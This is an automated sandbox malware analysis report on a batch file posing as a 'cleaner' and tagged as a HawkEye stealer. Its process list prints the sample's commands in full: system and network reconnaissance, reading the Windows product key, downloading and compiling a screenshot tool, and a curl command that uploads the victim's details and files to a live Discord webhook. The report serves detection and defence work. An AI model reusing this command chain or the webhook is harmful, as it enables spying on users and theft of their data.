Malware Analysis Report

2024-09-22 10:48

Sample ID 240714-qfmess1gqq
Target SchooiCleaner_F1.0.bat
SHA256 ab22ed1dc9c0a8eb99a8d0c4e496671c930e07d57b628da59fc30ad0900c6763
Tags
hawkeye execution keylogger spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ab22ed1dc9c0a8eb99a8d0c4e496671c930e07d57b628da59fc30ad0900c6763

Threat Level: Known bad

The file SchooiCleaner_F1.0.bat was found to be: Known bad.

Malicious Activity Summary

hawkeye execution keylogger spyware stealer trojan

HawkEye

Blocklisted process makes network request

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

Gathers network information

Gathers system information

Delays execution with timeout.exe

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-07-14 13:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-14 13:12

Reported

2024-07-14 13:14

Platform

win11-20240709-en

Max time kernel

37s

Max time network

35s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SchooiCleaner_F1.0.bat"

Signatures

HawkEye

keylogger trojan stealer spyware hawkeye

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\screenCapture.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 492 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 492 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 492 wrote to memory of 4548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 492 wrote to memory of 4548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 492 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 492 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 492 wrote to memory of 4028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 492 wrote to memory of 4028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 492 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 492 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2968 wrote to memory of 1432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 2968 wrote to memory of 1432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 2968 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2968 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 492 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 492 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2816 wrote to memory of 2560 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2560 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 492 wrote to memory of 4880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 492 wrote to memory of 4880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 492 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 492 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 492 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 492 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 492 wrote to memory of 232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 492 wrote to memory of 232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 492 wrote to memory of 3240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 492 wrote to memory of 3240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 492 wrote to memory of 2032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 492 wrote to memory of 2032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 492 wrote to memory of 3176 N/A C:\Windows\system32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 492 wrote to memory of 3176 N/A C:\Windows\system32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 492 wrote to memory of 3176 N/A C:\Windows\system32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3176 wrote to memory of 4808 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3176 wrote to memory of 4808 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3176 wrote to memory of 4808 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 492 wrote to memory of 724 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
PID 492 wrote to memory of 724 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
PID 492 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 492 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 492 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 492 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SchooiCleaner_F1.0.bat"

C:\Windows\system32\mode.com

mode con cols=80 lines=30

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\chcp.com

chcp 437

C:\Windows\system32\timeout.exe

timeout /t 5 /NOBREAK

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ping -4 -n 1 IMKBEUOX | findstr [

C:\Windows\system32\PING.EXE

ping -4 -n 1 IMKBEUOX

C:\Windows\system32\findstr.exe

findstr [

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Invoke-RestMethod api.ipify.org

C:\Windows\system32\timeout.exe

timeout /t 5 /NOBREAK

C:\Windows\system32\ipconfig.exe

ipconfig

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\Wbem\WMIC.exe

wmic path softwarelicensingservice get OA3xOriginalProductKey

C:\Windows\system32\timeout.exe

timeout /t 5 /NOBREAK

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "irm -useb https://raw.githubusercontent.com/npocmaka/batch.scripts/master/hybrids/.net/c/screenCapture.bat"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /out:"screenCapture.exe" "C:\Users\Admin\AppData\Local\Temp\SCREEN~1.BAT"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2100.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8847EBA4E1654F15B041DCA8FF9E22D4.TMP"

C:\Users\Admin\AppData\Local\Temp\screenCapture.exe

screenCapture.exe screenshot.png

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"~=CONNECTION ESTABLISHED=~ \nDate: Sun 07/14/2024 \nTime: 13:13:16.45 \nUsername: Admin \nComputer Name: IMKBEUOX \nPublic IP: 194.110.13.70 \nPrivate IP: 10.127.1.81 \nInfo and Screenshot:\"}" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\timeout.exe

timeout /t 3

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:49810 tcp
US 162.159.136.232:443 discord.com tcp

Files

memory/2560-0-0x00007FFC87313000-0x00007FFC87315000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wvfizt1j.dgv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2560-9-0x0000022C57FF0000-0x0000022C58012000-memory.dmp

memory/2560-10-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp

memory/2560-11-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp

memory/2560-12-0x0000022C585D0000-0x0000022C58792000-memory.dmp

memory/2560-15-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 bdc7698e710ff3ab8d3082fe5cee6627
SHA1 ae5d83861547ec78e37c54bc097b395869c25be3
SHA256 1089a92b42dcc3f7c6a4f368c7a3adf3fec33096842efb24de04ecd7c96c8dad
SHA512 08ca96be8fc8e6637de3e12fcea0b622f9858a3c1785ab02426202f1e17c973b1a53676c39dd41dcf755352ef863b1e58e204a8522a3b907267ff3a4b639ecaa

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 30d2d4c82b76613c32e68fbc259cacbf
SHA1 3057fc35febc98a40407d15f62ab2f3a1028a9d8
SHA256 97ea1ead9fad2488820c1fcc3dbd163043126d0a64251c8b20aca81a3b6e0dda
SHA512 6afac1e6a952cd60574b5e776cc7ad13d5ca95d31f3131016daa6a5d814d25d7851ddcba2d3c7b7f2c3c40df16d34b241cebbfa53894fa627952688904325007

C:\Users\Admin\AppData\Local\Temp\screenCapture.bat

MD5 7c39bedd33b129b84117cb4e188eb9b6
SHA1 43e660c225a60a8327c7ce73ab6abaddcd412122
SHA256 2490bf909afee37ddc6dca73d51950c648b815b8d5a1fd853ad9f69413f4a711
SHA512 de368b8161612f7998f98b15a36028068b08052fceb2468855005cdc5ae6e44bebc8e6d3f0b6d340cd6308597863c003a353fe95eedd6a0a5bb4320e36ba7490

\??\c:\Users\Admin\AppData\Local\Temp\CSC8847EBA4E1654F15B041DCA8FF9E22D4.TMP

MD5 b4aaae3b532554d0c7bd317d4834ab16
SHA1 28c854e399a3993ffd0df37b4385e29b4fe12905
SHA256 d7b2270159728b32e1ed60b03900ab7c9cb3c27df8f2456eae6824ad12f00f62
SHA512 ac6d36c61b057a0196cda5e249c5184a983bbf490ff1b54a6f263417e10c071addcb8437c840592e31637905e1fee10912e5932f9982e2abedc68cbb4a5e96a8

C:\Users\Admin\AppData\Local\Temp\RES2100.tmp

MD5 2b2865f9b0bc8e1e3427802d123e3f64
SHA1 b28cf208d8df3252e21e2e76f892a9b54b07971d
SHA256 ba2f0b1e7b61c763391cc592f23028ef43b2310d4e9d5d64244576e336634eb2
SHA512 d90069d6d0da337b973a80d727d85f4e3604a10fa2464cd02d591904a011472b8d0236ff0f75d3c4cbf7afd2b58006daffc08c9e09a3d21b78dc943a185a836f

C:\Users\Admin\AppData\Local\Temp\screenCapture.exe

MD5 c26bbbdf6bae2b13bd931c77944d8f1f
SHA1 80f13a90b702c99e71d23060af1801a0f1433753
SHA256 313028ef89b2462d6afc5446c21c5ed60bdc18d7075c713681bd310622898ffd
SHA512 bb7bd96889c474c29e0504b6751de98069d86fed200ac395e3608af92e59467197e7f63174ad345cfaef8b49eb3cee3c4bbf2dd8b68de6714cf2f85d1b12d447

memory/724-63-0x0000000000790000-0x0000000000798000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\screenshot.png

MD5 e17e867c13a606881c19af05e2f032c7
SHA1 44b4fa7594e0ddea3585b96b5d67fa67a3668cbd
SHA256 5b8636f0d5ce69f86e8bdf5334d89d1022d2e19edd2216212a921572a9789454
SHA512 300454eeccf97c2556f0d2f767a8e76a0cd03a34b62059fa906522f72c122c21719ebb08752d7f2213d857d800fa17666b20f0877d76d814662fbc5bc86c35b2

C:\Users\Admin\AppData\Local\Temp\liscense.txt

MD5 b77c85675375ed548a4c019ae9ad5eda
SHA1 f1f6559245707e38403b72c57f201784f1086f7d
SHA256 81a02546f3d9da106053d1800ba1a0c00815a8903661b5c1c086a5c88aedd1f9
SHA512 3d6cdefda811dcaaff88f54117f03bfff04a04ba03efdf45167a7c4712bab3334974b404421d5bd1e3ad7eb65b0c390ddf472f9d256bd0cd8786e87ab8571bef

C:\Users\Admin\AppData\Local\Temp\dir.txt

MD5 4f7c335086aa1e994a32fa877cbfcdea
SHA1 b1f77e8fda9c6d5792f25de72dd897130604a3e1
SHA256 af7b33f8b82794179a097fc8bffb2edfdb854e0f0f280c1fe5bc93e8d0b683e2
SHA512 657c7d3086a6bd8418d53b43689f416f3e607f5c46c9cc88e4a732319c8901db1417d746b93f65ddeb20f921810ec4ac9464c6e1d2ebabb68ceb685d6166d0cd

C:\Users\Admin\AppData\Local\Temp\sysinfo.txt

MD5 17a00ddef13a77fea662458994164ff5
SHA1 529cde1ee203abbc15d8bdc796947a7e3586e531
SHA256 8be7fbb0dfd6a6e999ba11ccc08c1883d8884bd9ed5b79f9d0833230c99ab57b
SHA512 f90efbd6ed21c5c4128de7a46ad86cc3bed256d24923f400df2c00bcda7922350977cf21b194167e54c87e6e3b168fa89da97bca8ab14814c4c127709963d805

C:\Users\Admin\AppData\Local\Temp\ipconfig.txt

MD5 d78118f5f9b8716449d87d231f6993ed
SHA1 d7d2d4783f3d40c5af355091d70f9ad4d4335ab7
SHA256 c1502b621b88e46f262a466d8bffabef3e7095ff012a0a52fe38ee4343b0c135
SHA512 cac300ec07dab390ebb3265763a93189c9d91c8ea78c597b077f3bd7ea7ef14a5779233dc053cbb877cf3454c60e0059585aa252903ba6ff297a5d3fe59676c3